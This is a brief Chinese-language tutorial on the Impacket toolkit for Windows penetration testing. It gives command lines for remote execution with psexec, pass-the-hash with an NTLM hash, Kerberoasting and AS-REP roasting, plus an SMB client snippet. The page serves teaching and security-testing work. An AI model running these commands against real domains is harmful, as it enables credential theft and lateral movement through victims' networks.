Impacket协议利用库
Impacket协议利用库
Impacket 简介
Impacket 是 Python 编写的网络协议工具集合,主要用于 Windows 环境的渗透测试。它实现了 SMB、Kerberos、LDAP 等多种协议。
安装
pip install impacket常用工具
PsExec — 远程命令执行
impacket-psexec domain/user:password@targetSMB 客户端
from impacket.smbconnection import SMBConnection
conn = SMBConnection('target_ip', 445)
conn.login('username', 'password')
shares = conn.listShares()Pass-the-Hash
impacket-psexec -hashes :ntlm_hash domain/user@target使用 NTLM Hash 直接认证,无需明文密码。
Kerberos 攻击
Kerberoasting
impacket-GetUserSPNs domain/user:password -request获取服务票据后离线破解服务账户密码。
AS-REP Roasting
impacket-GetNPUsers domain/ -usersfile users.txt -no-pass总结
Impacket 是内网渗透的核心工具库。掌握 Impacket 的使用,能够在 Windows 域环境中进行高效的横向移动。